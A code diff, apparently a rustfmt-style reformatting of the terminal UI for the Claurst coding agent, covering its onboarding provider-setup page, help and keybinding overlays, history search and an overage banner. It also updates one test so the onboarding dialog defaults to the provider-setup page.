     let lines: Vec<Line<'static>> = vec![
         Line::from(""),
         Line::from(vec![
-            Span::styled("  No credentials found. ", Style::default().fg(Color::White)),
-            Span::styled("Pick a provider below:", Style::default().fg(Color::Rgb(180, 180, 180))),
+            Span::styled(
+                "  No credentials found. ",
+                Style::default().fg(Color::White),
+            ),
+            Span::styled(
+                "Pick a provider below:",
+                Style::default().fg(Color::Rgb(180, 180, 180)),
+            ),
         ]),
         Line::from(""),
         // ── 1. Anthropic ──────────────────────────────────────
         Line::from(vec![
-            Span::styled("  1  ", Style::default().fg(pink).add_modifier(Modifier::BOLD)),
-            Span::styled("Anthropic", Style::default().fg(Color::White).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "  1  ",
+                Style::default().fg(pink).add_modifier(Modifier::BOLD),
+            ),
+            Span::styled(
+                "Anthropic",
+                Style::default()
+                    .fg(Color::White)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::styled("  Claude Opus · Sonnet · Haiku", Style::default().fg(dim)),
         ]),
         Line::from(vec![
             Span::styled("     › ", Style::default().fg(pink)),
-            Span::styled("claurst auth login", Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "claurst auth login",
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
+            ),
         ]),
-        Line::from(Span::styled(sep, Style::default().fg(Color::Rgb(45, 45, 55)))),
+        Line::from(Span::styled(
+            sep,
+            Style::default().fg(Color::Rgb(45, 45, 55)),
+        )),
         // ── 2. OpenAI ─────────────────────────────────────────
         Line::from(vec![
-            Span::styled("  2  ", Style::default().fg(pink).add_modifier(Modifier::BOLD)),
-            Span::styled("OpenAI", Style::default().fg(Color::White).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "  2  ",
+                Style::default().fg(pink).add_modifier(Modifier::BOLD),
+            ),
+            Span::styled(
+                "OpenAI",
+                Style::default()
+                    .fg(Color::White)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::styled("  GPT-4o · o3 · o4-mini", Style::default().fg(dim)),
         ]),
         Line::from(vec![
             Span::styled("     › ", Style::default().fg(pink)),
-            Span::styled("set OPENAI_API_KEY=<key>", Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "set OPENAI_API_KEY=<key>",
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::styled("  then restart", Style::default().fg(dim)),
         ]),
-        Line::from(Span::styled(sep, Style::default().fg(Color::Rgb(45, 45, 55)))),
+        Line::from(Span::styled(
+            sep,
+            Style::default().fg(Color::Rgb(45, 45, 55)),
+        )),
         // ── 3. Google ─────────────────────────────────────────
         Line::from(vec![
-            Span::styled("  3  ", Style::default().fg(pink).add_modifier(Modifier::BOLD)),
-            Span::styled("Google", Style::default().fg(Color::White).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "  3  ",
+                Style::default().fg(pink).add_modifier(Modifier::BOLD),
+            ),
+            Span::styled(
+                "Google",
+                Style::default()
+                    .fg(Color::White)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::styled("  Gemini 2.5 Pro · Flash", Style::default().fg(dim)),
         ]),
         Line::from(vec![
             Span::styled("     › ", Style::default().fg(pink)),
-            Span::styled("set GOOGLE_API_KEY=<key>", Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "set GOOGLE_API_KEY=<key>",
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::styled("  then restart", Style::default().fg(dim)),
         ]),
-        Line::from(Span::styled(sep, Style::default().fg(Color::Rgb(45, 45, 55)))),
+        Line::from(Span::styled(
+            sep,
+            Style::default().fg(Color::Rgb(45, 45, 55)),
+        )),
         // ── 4. Groq ───────────────────────────────────────────
         Line::from(vec![
-            Span::styled("  4  ", Style::default().fg(pink).add_modifier(Modifier::BOLD)),
-            Span::styled("Groq", Style::default().fg(Color::White).add_modifier(Modifier::BOLD)),
-            Span::styled("  Fast inference · Free tier · groq.com/keys", Style::default().fg(dim)),
+            Span::styled(
+                "  4  ",
+                Style::default().fg(pink).add_modifier(Modifier::BOLD),
+            ),
+            Span::styled(
+                "Groq",
+                Style::default()
+                    .fg(Color::White)
+                    .add_modifier(Modifier::BOLD),
+            ),
+            Span::styled(
+                "  Fast inference · Free tier · groq.com/keys",
+                Style::default().fg(dim),
+            ),
         ]),
         Line::from(vec![
             Span::styled("     › ", Style::default().fg(pink)),
-            Span::styled("set GROQ_API_KEY=<key>", Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "set GROQ_API_KEY=<key>",
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::styled("  then restart", Style::default().fg(dim)),
         ]),
-        Line::from(Span::styled(sep, Style::default().fg(Color::Rgb(45, 45, 55)))),
+        Line::from(Span::styled(
+            sep,
+            Style::default().fg(Color::Rgb(45, 45, 55)),
+        )),
         // ── 5. Ollama ─────────────────────────────────────────
         Line::from(vec![
-            Span::styled("  5  ", Style::default().fg(pink).add_modifier(Modifier::BOLD)),
-            Span::styled("Ollama", Style::default().fg(Color::White).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "  5  ",
+                Style::default().fg(pink).add_modifier(Modifier::BOLD),
+            ),
+            Span::styled(
+                "Ollama",
+                Style::default()
+                    .fg(Color::White)
+                    .add_modifier(Modifier::BOLD),
+            ),
             Span::styled("  Local models · No key needed", Style::default().fg(dim)),
         ]),
         Line::from(vec![
             Span::styled("     › ", Style::default().fg(pink)),
-            Span::styled("claurst --provider ollama", Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD)),
+            Span::styled(
+                "claurst --provider ollama",
+                Style::default()
+                    .fg(Color::Yellow)
+                    .add_modifier(Modifier::BOLD),
+            ),
         ]),
         Line::from(""),
         Line::from(vec![
             Span::styled("  + ", Style::default().fg(Color::Rgb(120, 120, 120))),
-            Span::styled("20+ more providers: ", Style::default().fg(Color::Rgb(120, 120, 120))),
-            Span::styled("claurst --help", Style::default().fg(Color::Rgb(150, 150, 150))),
+            Span::styled(
+                "20+ more providers: ",
+                Style::default().fg(Color::Rgb(120, 120, 120)),
+            ),
+            Span::styled(
+                "claurst --help",
+                Style::default().fg(Color::Rgb(150, 150, 150)),
+            ),
         ]),
         Line::from(""),
         Line::from(vec![
@@ -214,7 +305,9 @@ fn render_provider_setup_page(frame: &mut Frame, area: Rect) {
         Line::from(""),
         Line::from(vec![Span::styled(
             "  Esc: dismiss  (you can configure later with /providers)",
-            Style::default().fg(Color::DarkGray).add_modifier(Modifier::ITALIC),
+            Style::default()
+                .fg(Color::DarkGray)
+                .add_modifier(Modifier::ITALIC),
         )]),
     ];
 
@@ -242,14 +335,8 @@ fn render_welcome_page(frame: &mut Frame, area: Rect) {
 
     let cmd_label = |slash: &str, desc: &str| -> Line<'static> {
         Line::from(vec![
-            Span::styled(
-                format!("  {:<12}", slash),
-                Style::default().fg(pink),
-            ),
-            Span::styled(
-                desc.to_string(),
-                Style::default().fg(text),
-            ),
+            Span::styled(format!("  {:<12}", slash), Style::default().fg(pink)),
+            Span::styled(desc.to_string(), Style::default().fg(text)),
         ])
     };
 
@@ -257,10 +344,16 @@ fn render_welcome_page(frame: &mut Frame, area: Rect) {
         Line::from(vec![
             Span::styled(
                 " Welcome to Claurst",
-                Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(Color::White)
+                    .add_modifier(Modifier::BOLD),
             ),
             Span::styled(
-                format!("{:>width$}", "1/2 ", width = inner.width.saturating_sub(21) as usize),
+                format!(
+                    "{:>width$}",
+                    "1/2 ",
+                    width = inner.width.saturating_sub(21) as usize
+                ),
                 Style::default().fg(dim),
             ),
         ]),
@@ -274,9 +367,18 @@ fn render_welcome_page(frame: &mut Frame, area: Rect) {
             "  How to use:",
             Style::default().fg(pink).add_modifier(Modifier::BOLD),
         )),
-        Line::from(Span::styled("  Type your request and press Enter to send it.", Style::default().fg(text))),
-        Line::from(Span::styled("  Claurst can read, edit, and create files in your project.", Style::default().fg(text))),
-        Line::from(Span::styled("  Claurst can run bash commands, search the web, and more.", Style::default().fg(text))),
+        Line::from(Span::styled(
+            "  Type your request and press Enter to send it.",
+            Style::default().fg(text),
+        )),
+        Line::from(Span::styled(
+            "  Claurst can read, edit, and create files in your project.",
+            Style::default().fg(text),
+        )),
+        Line::from(Span::styled(
+            "  Claurst can run bash commands, search the web, and more.",
+            Style::default().fg(text),
+        )),
         Line::from(""),
         Line::from(Span::styled(
             "  Slash commands:",
@@ -297,7 +399,9 @@ fn render_welcome_page(frame: &mut Frame, area: Rect) {
         ]),
     ];
 
-    Paragraph::new(lines).bg(CLAURST_PANEL_BG).render(inner, frame.buffer_mut());
+    Paragraph::new(lines)
+        .bg(CLAURST_PANEL_BG)
+        .render(inner, frame.buffer_mut());
 }
 
 fn render_keybindings_page(frame: &mut Frame, area: Rect) {
@@ -328,27 +432,42 @@ fn render_keybindings_page(frame: &mut Frame, area: Rect) {
         Line::from(vec![
             Span::styled(
                 " Keyboard Shortcuts",
-                Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(Color::White)
+                    .add_modifier(Modifier::BOLD),
             ),
             Span::styled(
-                format!("{:>width$}", "2/2 ", width = inner.width.saturating_sub(21) as usize),
+                format!(
+                    "{:>width$}",
+                    "2/2 ",
+                    width = inner.width.saturating_sub(21) as usize
+                ),
                 Style::default().fg(dim),
             ),
         ]),
         Line::from(""),
-        Line::from(Span::styled("  Input", Style::default().fg(pink).add_modifier(Modifier::BOLD))),
+        Line::from(Span::styled(
+            "  Input",
+            Style::default().fg(pink).add_modifier(Modifier::BOLD),
+        )),
         kb("Enter", "send message"),
         kb("Shift+Enter", "newline"),
         kb("Ctrl+C", "interrupt / cancel"),
         kb("Tab", "cycle mode (build/plan/explore)"),
         kb("\u{2191}\u{2193}", "history"),
         Line::from(""),
-        Line::from(Span::styled("  Navigation", Style::default().fg(pink).add_modifier(Modifier::BOLD))),
+        Line::from(Span::styled(
+            "  Navigation",
+            Style::default().fg(pink).add_modifier(Modifier::BOLD),
+        )),
         kb("PgUp/PgDn", "scroll transcript"),
         kb("Ctrl+K", "command palette"),
         kb("Ctrl+A", "model picker"),
         Line::from(""),
-        Line::from(Span::styled("  Permissions", Style::default().fg(pink).add_modifier(Modifier::BOLD))),
+        Line::from(Span::styled(
+            "  Permissions",
+            Style::default().fg(pink).add_modifier(Modifier::BOLD),
+        )),
         kb("y", "allow tool once"),
         kb("Y", "allow all this session"),
         kb("n", "deny tool"),
@@ -370,7 +489,9 @@ fn render_keybindings_page(frame: &mut Frame, area: Rect) {
         Span::styled("close", Style::default().fg(dim)),
     ]));
 
-    Paragraph::new(lines).bg(CLAURST_PANEL_BG).render(inner, frame.buffer_mut());
+    Paragraph::new(lines)
+        .bg(CLAURST_PANEL_BG)
+        .render(inner, frame.buffer_mut());
 }
 
 // ---------------------------------------------------------------------------
@@ -387,7 +508,7 @@ mod tests {
     fn onboarding_defaults_hidden() {
         let state = OnboardingDialogState::new();
         assert!(!state.visible);
-        assert_eq!(state.page, OnboardingPage::Welcome);
+        assert_eq!(state.page, OnboardingPage::ProviderSetup);
     }
 
     #[test]
@@ -423,10 +544,17 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(100, 30)).unwrap();
         let mut state = OnboardingDialogState::new();
         state.show();
-        terminal.draw(|frame| {
-            render_onboarding_dialog(frame, &state, frame.area());
-        }).unwrap();
-        let content: String = terminal.backend().buffer().clone().content().iter()
+        terminal
+            .draw(|frame| {
+                render_onboarding_dialog(frame, &state, frame.area());
+            })
+            .unwrap();
+        let content: String = terminal
+            .backend()
+            .buffer()
+            .clone()
+            .content()
+            .iter()
             .map(|c| c.symbol().chars().next().unwrap_or(' '))
             .collect();
         assert!(content.contains("Welcome") || content.contains("Claurst"));
@@ -438,10 +566,17 @@ mod tests {
         let mut state = OnboardingDialogState::new();
         state.show();
         state.next_page();
-        terminal.draw(|frame| {
-            render_onboarding_dialog(frame, &state, frame.area());
-        }).unwrap();
-        let content: String = terminal.backend().buffer().clone().content().iter()
+        terminal
+            .draw(|frame| {
+                render_onboarding_dialog(frame, &state, frame.area());
+            })
+            .unwrap();
+        let content: String = terminal
+            .backend()
+            .buffer()
+            .clone()
+            .content()
+            .iter()
             .map(|c| c.symbol().chars().next().unwrap_or(' '))
             .collect();
         assert!(content.contains("Keyboard") || content.contains("Enter"));
@@ -452,9 +587,11 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(80, 24)).unwrap();
         let state = OnboardingDialogState::new(); // visible = false
         let before = terminal.backend().buffer().clone();
-        terminal.draw(|frame| {
-            render_onboarding_dialog(frame, &state, frame.area());
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                render_onboarding_dialog(frame, &state, frame.area());
+            })
+            .unwrap();
         assert_eq!(terminal.backend().buffer().content(), before.content());
     }
 }

--- a/src-rust/crates/tui/src/overage_upsell.rs
+++ b/src-rust/crates/tui/src/overage_upsell.rs
@@ -52,7 +52,11 @@ impl OverageCreditUpsellState {
 
     /// Height the banner occupies (0 if not visible).
     pub fn height(&self) -> u16 {
-        if self.visible { 4 } else { 0 }
+        if self.visible {
+            4
+        } else {
+            0
+        }
     }
 }
 
@@ -150,10 +154,20 @@ mod tests {
     fn overage_upsell_render_smoke() {
         let mut state = OverageCreditUpsellState::new();
         state.show(250);
-        let area = Rect { x: 0, y: 0, width: 80, height: 6 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 80,
+            height: 6,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_overage_upsell(&state, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(rendered.contains("Overage Alert"));
         assert!(rendered.contains("credits"));
     }
@@ -161,10 +175,20 @@ mod tests {
     #[test]
     fn overage_upsell_not_rendered_when_invisible() {
         let state = OverageCreditUpsellState::new();
-        let area = Rect { x: 0, y: 0, width: 80, height: 6 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 80,
+            height: 6,
+        };
         let mut buf = ratatui::buffer::Buffer::empty(area);
         render_overage_upsell(&state, area, &mut buf);
-        let rendered = buf.content.iter().map(|c| c.symbol()).collect::<Vec<_>>().join("");
+        let rendered = buf
+            .content
+            .iter()
+            .map(|c| c.symbol())
+            .collect::<Vec<_>>()
+            .join("");
         assert!(!rendered.contains("Overage"));
     }
 }

--- a/src-rust/crates/tui/src/overlays.rs
+++ b/src-rust/crates/tui/src/overlays.rs
@@ -159,7 +159,9 @@ pub fn modal_title_line(title: &str, right_hint: &str) -> Line<'static> {
     Line::from(vec![
         Span::styled(
             format!(" {}", title),
-            Style::default().fg(CLAURST_TEXT).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(CLAURST_TEXT)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(
             format!("  {}", right_hint),
@@ -180,15 +182,22 @@ pub fn render_modal_title_frame(frame: &mut Frame, area: Rect, title: &str, righ
     let line = Line::from(vec![
         Span::styled(
             format!(" {}", title),
-            Style::default().fg(CLAURST_TEXT).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(CLAURST_TEXT)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(" ".repeat(padding), Style::default().fg(CLAURST_TEXT)),
-        Span::styled(
-            right_hint.to_string(),
-            Style::default().fg(CLAURST_MUTED),
-        ),
+        Span::styled(right_hint.to_string(), Style::default().fg(CLAURST_MUTED)),
     ]);
-    frame.render_widget(Paragraph::new(line), Rect { x: area.x, y: area.y, width: area.width, height: 1 });
+    frame.render_widget(
+        Paragraph::new(line),
+        Rect {
+            x: area.x,
+            y: area.y,
+            width: area.width,
+            height: 1,
+        },
+    );
 }
 
 pub fn render_modal_title_buf(buf: &mut Buffer, area: Rect, title: &str, right_hint: &str) {
@@ -203,13 +212,12 @@ pub fn render_modal_title_buf(buf: &mut Buffer, area: Rect, title: &str, right_h
     let line = Line::from(vec![
         Span::styled(
             format!(" {}", title),
-            Style::default().fg(CLAURST_TEXT).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(CLAURST_TEXT)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled(" ".repeat(padding), Style::default().fg(CLAURST_TEXT)),
-        Span::styled(
-            right_hint.to_string(),
-            Style::default().fg(CLAURST_MUTED),
-        ),
+        Span::styled(right_hint.to_string(), Style::default().fg(CLAURST_MUTED)),
     ]);
     Paragraph::new(line).render(
         Rect {
@@ -297,9 +305,8 @@ impl HelpOverlay {
     pub fn populate_from_commands(&mut self, entries: Vec<HelpEntry>) {
         self.commands = entries;
         // Sort stable by category, then name for consistent display.
-        self.commands.sort_by(|a, b| {
-            a.category.cmp(&b.category).then(a.name.cmp(&b.name))
-        });
+        self.commands
+            .sort_by(|a, b| a.category.cmp(&b.category).then(a.name.cmp(&b.name)));
     }
 
     pub fn toggle(&mut self) {
@@ -340,9 +347,9 @@ impl HelpOverlay {
 
 /// Render the help overlay into the frame.
 pub fn render_help_overlay(frame: &mut Frame, overlay: &HelpOverlay, area: Rect) {
+    use claurst_core::constants::APP_VERSION;
     use ratatui::layout::{Constraint, Direction, Layout};
     use ratatui::widgets::Wrap;
-    use claurst_core::constants::APP_VERSION;
 
     if !overlay.visible {
         return;
@@ -367,7 +374,11 @@ pub fn render_help_overlay(frame: &mut Frame, overlay: &HelpOverlay, area: Rect)
 
     let col_chunks = Layout::default()
         .direction(Direction::Horizontal)
-        .constraints([Constraint::Percentage(42), Constraint::Length(1), Constraint::Min(1)])
+        .constraints([
+            Constraint::Percentage(42),
+            Constraint::Length(1),
+            Constraint::Min(1),
+        ])
         .split(content_area);
 
     // ─── Left column: keyboard shortcuts by category ───────────────────────
@@ -375,19 +386,23 @@ pub fn render_help_overlay(frame: &mut Frame, overlay: &HelpOverlay, area: Rect)
 
     left_lines.push(Line::from(Span::styled(
         " Keyboard Shortcuts",
-        Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
     )));
     left_lines.push(Line::from(""));
 
     // Navigation category
     left_lines.push(Line::from(Span::styled(
         " Navigation",
-        Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
     )));
     for (key, desc) in &[
-        ("PageUp / PgDn",   "Scroll messages"),
-        ("j / k",           "Scroll one line"),
-        ("Home / End",      "Top / bottom"),
+        ("PageUp / PgDn", "Scroll messages"),
+        ("j / k", "Scroll one line"),
+        ("Home / End", "Top / bottom"),
     ] {
         left_lines.push(kb_line(key, desc));
     }
@@ -396,13 +411,15 @@ pub fn render_help_overlay(frame: &mut Frame, overlay: &HelpOverlay, area: Rect)
     // Input category
     left_lines.push(Line::from(Span::styled(
         " Input",
-        Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
     )));
     for (key, desc) in &[
-        ("Enter",           "Submit message"),
-        ("Up / Down",       "Input history"),
-        ("Ctrl+R",          "Search history"),
-        ("Esc",             "Cancel / close"),
+        ("Enter", "Submit message"),
+        ("Up / Down", "Input history"),
+        ("Ctrl+R", "Search history"),
+        ("Esc", "Cancel / close"),
     ] {
         left_lines.push(kb_line(key, desc));
     }
@@ -411,15 +428,17 @@ pub fn render_help_overlay(frame: &mut Frame, overlay: &HelpOverlay, area: Rect)
     // App category
     left_lines.push(Line::from(Span::styled(
         " App",
-        Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
     )));
     for (key, desc) in &[
-        ("F1 / ?",          "Toggle help"),
-        ("Ctrl+A",          "Model picker"),
-        ("Ctrl+K",          "Command palette"),
-        ("Ctrl+C",          "Cancel / quit"),
-        ("Ctrl+D",          "Quit (empty input)"),
-        ("Ctrl+L",          "Clear screen"),
+        ("F1 / ?", "Toggle help"),
+        ("Ctrl+A", "Model picker"),
+        ("Ctrl+K", "Command palette"),
+        ("Ctrl+C", "Cancel / quit"),
+        ("Ctrl+D", "Quit (empty input)"),
+        ("Ctrl+L", "Clear screen"),
     ] {
         left_lines.push(kb_line(key, desc));
     }
@@ -454,7 +473,9 @@ pub fn render_help_overlay(frame: &mut Frame, overlay: &HelpOverlay, area: Rect)
 
     right_lines.push(Line::from(Span::styled(
         " Slash Commands",
-        Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(CLAURST_ACCENT)
+            .add_modifier(Modifier::BOLD),
     )));
     right_lines.push(Line::from(""));
 
@@ -467,7 +488,9 @@ pub fn render_help_overlay(frame: &mut Frame, overlay: &HelpOverlay, area: Rect)
             }
             right_lines.push(Line::from(Span::styled(
                 format!(" {}", entry.category),
-                Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(CLAURST_ACCENT)
+                    .add_modifier(Modifier::BOLD),
             )));
         }
         let aliases_text = if entry.aliases.is_empty() {
@@ -479,11 +502,16 @@ pub fn render_help_overlay(frame: &mut Frame, overlay: &HelpOverlay, area: Rect)
             Span::raw("  "),
             Span::styled(
                 format!("/{:<14}", entry.name),
-                Style::default().fg(CLAURST_TEXT).add_modifier(Modifier::BOLD),
+                Style::default()
+                    .fg(CLAURST_TEXT)
+                    .add_modifier(Modifier::BOLD),
             ),
             Span::styled(aliases_text, Style::default().fg(CLAURST_MUTED)),
             Span::raw("  "),
-            Span::styled(entry.description.clone(), Style::default().fg(CLAURST_MUTED)),
+            Span::styled(
+                entry.description.clone(),
+                Style::default().fg(CLAURST_MUTED),
+            ),
         ]));
     }
 
@@ -507,17 +535,15 @@ pub fn render_help_overlay(frame: &mut Frame, overlay: &HelpOverlay, area: Rect)
         col_chunks[2],
     );
 
-    let version_line = Line::from(vec![
-        Span::styled(
-            format!(
-                " v{}  ·  type to filter  ·  ↑↓ scroll commands  ·  esc close",
-                APP_VERSION
-            ),
-            Style::default()
-                .fg(CLAURST_MUTED)
-                .add_modifier(Modifier::ITALIC),
+    let version_line = Line::from(vec![Span::styled(
+        format!(
+            " v{}  ·  type to filter  ·  ↑↓ scroll commands  ·  esc close",
+            APP_VERSION
         ),
-    ]);
+        Style::default()
+            .fg(CLAURST_MUTED)
+            .add_modifier(Modifier::ITALIC),
+    )]);
     frame.render_widget(Paragraph::new(version_line), layout.footer_area);
 }
 
@@ -552,12 +578,20 @@ pub struct HistoryEntry {
 impl HistoryEntry {
     /// Create a new entry stamped with the current time.
     pub fn new(text: String) -> Self {
-        Self { text, timestamp: Some(current_unix_secs()), pinned: false }
+        Self {
+            text,
+            timestamp: Some(current_unix_secs()),
+            pinned: false,
+        }
     }
 
     /// Create a legacy entry without a timestamp.
     pub fn legacy(text: String) -> Self {
-        Self { text, timestamp: None, pinned: false }
+        Self {
+            text,
+            timestamp: None,
+            pinned: false,
+        }
     }
 
     /// Human-readable relative time: "just now", "2m ago", "3h ago", "2d ago", etc.
@@ -599,8 +633,7 @@ pub fn load_pinned_texts() -> std::collections::HashSet<String> {
         Ok(c) => c,
         Err(_) => return std::collections::HashSet::new(),
     };
-    serde_json::from_str::<std::collections::HashSet<String>>(&content)
-        .unwrap_or_default()
+    serde_json::from_str::<std::collections::HashSet<String>>(&content).unwrap_or_default()
 }
 
 /// Persist `pinned_texts` to `~/.claurst/history_pins.json`.
@@ -797,9 +830,13 @@ impl HistorySearchOverlay {
     /// Persists the updated pin set to `~/.claurst/history_pins.json` and
     /// recomputes the match list so the entry moves to/from the pinned section.
     pub fn toggle_pin(&mut self) {
-        let Some(m) = self.matches.get(self.selected_idx) else { return };
+        let Some(m) = self.matches.get(self.selected_idx) else {
+            return;
+        };
         let snap_idx = m.snapshot_idx;
-        let Some(entry) = self.snapshot.get_mut(snap_idx) else { return };
+        let Some(entry) = self.snapshot.get_mut(snap_idx) else {
+            return;
+        };
         entry.pinned = !entry.pinned;
 
         // Rebuild the persisted pin set from the full snapshot.
@@ -845,12 +882,21 @@ impl HistorySearchOverlay {
         // Sort: pinned entries always first, then by score descending.
         // Stable sort preserves insertion order for ties within each group.
         scored.sort_by(|a, b| {
-            let a_pinned = self.snapshot.get(a.snapshot_idx).map_or(false, |e| e.pinned);
-            let b_pinned = self.snapshot.get(b.snapshot_idx).map_or(false, |e| e.pinned);
+            let a_pinned = self
+                .snapshot
+                .get(a.snapshot_idx)
+                .map_or(false, |e| e.pinned);
+            let b_pinned = self
+                .snapshot
+                .get(b.snapshot_idx)
+                .map_or(false, |e| e.pinned);
             match (b_pinned, a_pinned) {
                 (true, false) => std::cmp::Ordering::Greater,
                 (false, true) => std::cmp::Ordering::Less,
-                _ => b.score.partial_cmp(&a.score).unwrap_or(std::cmp::Ordering::Equal),
+                _ => b
+                    .score
+                    .partial_cmp(&a.score)
+                    .unwrap_or(std::cmp::Ordering::Equal),
             }
         });
 
@@ -964,7 +1010,9 @@ pub fn render_history_search_overlay(
         Span::raw("  Search: "),
         Span::styled(
             overlay.query.clone(),
-            Style::default().fg(Color::White).add_modifier(Modifier::BOLD),
+            Style::default()
+                .fg(Color::White)
+                .add_modifier(Modifier::BOLD),
         ),
         Span::styled("\u{2588}", Style::default().fg(Color::White)),
         Span::raw("  "),
@@ -994,17 +1042,12 @@ pub fn render_history_search_overlay(
             let is_selected = real_i == overlay.selected_idx;
 
             // Resolve snapshot entry (for text, timestamp, pinned state).
-            let snap_entry: Option<&HistoryEntry> =
-                overlay.snapshot.get(match_entry.snapshot_idx);
+            let snap_entry: Option<&HistoryEntry> = overlay.snapshot.get(match_entry.snapshot_idx);
 
             // Resolve entry text: prefer snapshot, fall back to passed-in history.
             let entry_text: &str = snap_entry
                 .map(|e| e.text.as_str())
-                .or_else(|| {
-                    history
-                        .get(match_entry.snapshot_idx)
-                        .map(String::as_str)
-                })
+                .or_else(|| history.get(match_entry.snapshot_idx).map(String::as_str))
                 .unwrap_or("");
 
             let is_pinned = snap_entry.map_or(false, |e| e.pinned);
@@ -1013,7 +1056,11 @@ pub fn render_history_search_overlay(
             let time_suffix: String = snap_entry
                 .map(|e| {
                     let t = e.relative_time();
-                    if t.is_empty() { t } else { format!(" · {}", t) }
+                    if t.is_empty() {
+                        t
+                    } else {
+                        format!(" · {}", t)
+                    }
                 })
                 .unwrap_or_default();
 
@@ -1022,8 +1069,8 @@ pub fn render_history_search_overlay(
             let pin_prefix_width: usize = if is_pinned { 2 } else { 0 };
             let prefix_width: usize = 4 + pin_prefix_width; // "    " or "  ► " + optional "★ "
             let time_width = UnicodeWidthStr::width(time_suffix.as_str());
-            let max_text_chars = (dialog_width as usize)
-                .saturating_sub(prefix_width + time_width + 2);
+            let max_text_chars =
+                (dialog_width as usize).saturating_sub(prefix_width + time_width + 2);
 
             let (prefix, base_style) = if is_selected {
                 (
@@ -1050,7 +1097,7 @@ pub fn render_history_search_overlay(
             // Pin star badge (shown for all pinned entries)
             if is_pinned {
                 row_spans.push(Span::styled(
-                    "\u{2605} ",  // ★
+                    "\u{2605} ", // ★
                     Style::default()
                         .fg(Color::Yellow)
                         .add_modifier(Modifier::BOLD),
@@ -1102,8 +1149,7 @@ fn build_highlighted_spans<'a>(
     let chars: Vec<(usize, char)> = text.char_indices().collect();
 
     // Convert highlight byte-positions to a set of byte offsets for O(1) lookup
-    let hl_set: std::collections::HashSet<usize> =
-        highlight_positions.iter().copied().collect();
+    let hl_set: std::collections::HashSet<usize> = highlight_positions.iter().copied().collect();
 
     let mut spans: Vec<Span<'a>> = Vec::new();
     let mut current_text = String::new();
@@ -1143,7 +1189,10 @@ fn build_highlighted_spans<'a>(
         spans.push(Span::styled(current_text, style));
     }
     if truncated {
-        spans.push(Span::styled("…".to_string(), Style::default().fg(Color::DarkGray)));
+        spans.push(Span::styled(
+            "…".to_string(),
+            Style::default().fg(Color::DarkGray),
+        ));
     }
     spans
 }
@@ -1249,7 +1298,9 @@ pub fn render_message_selector(frame: &mut Frame, overlay: &MessageSelectorOverl
 
     lines.push(Line::from(vec![Span::styled(
         "  Select a message to rewind to:",
-        Style::default().fg(Color::Yellow).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(Color::Yellow)
+            .add_modifier(Modifier::BOLD),
     )]));
     lines.push(Line::from(""));
 
@@ -1295,11 +1346,13 @@ pub fn render_message_selector(frame: &mut Frame, overlay: &MessageSelectorOverl
                 Span::styled(format!("{:>3}. ", msg.idx), idx_style),
                 Span::styled(
                     format!("{:<10}", msg.role),
-                    Style::default().fg(role_color).add_modifier(if is_selected {
-                        Modifier::BOLD
-                    } else {
-                        Modifier::empty()
-                    }),
+                    Style::default()
+                        .fg(role_color)
+                        .add_modifier(if is_selected {
+                            Modifier::BOLD
+                        } else {
+                            Modifier::empty()
+                        }),
                 ),
                 Span::styled(
                     preview,
@@ -1309,10 +1362,7 @@ pub fn render_message_selector(frame: &mut Frame, overlay: &MessageSelectorOverl
                         Style::default().fg(Color::DarkGray)
                     },
                 ),
-                Span::styled(
-                    tool_tag.to_string(),
-                    Style::default().fg(Color::Yellow),
-                ),
+                Span::styled(tool_tag.to_string(), Style::default().fg(Color::Yellow)),
             ]));
         }
     }
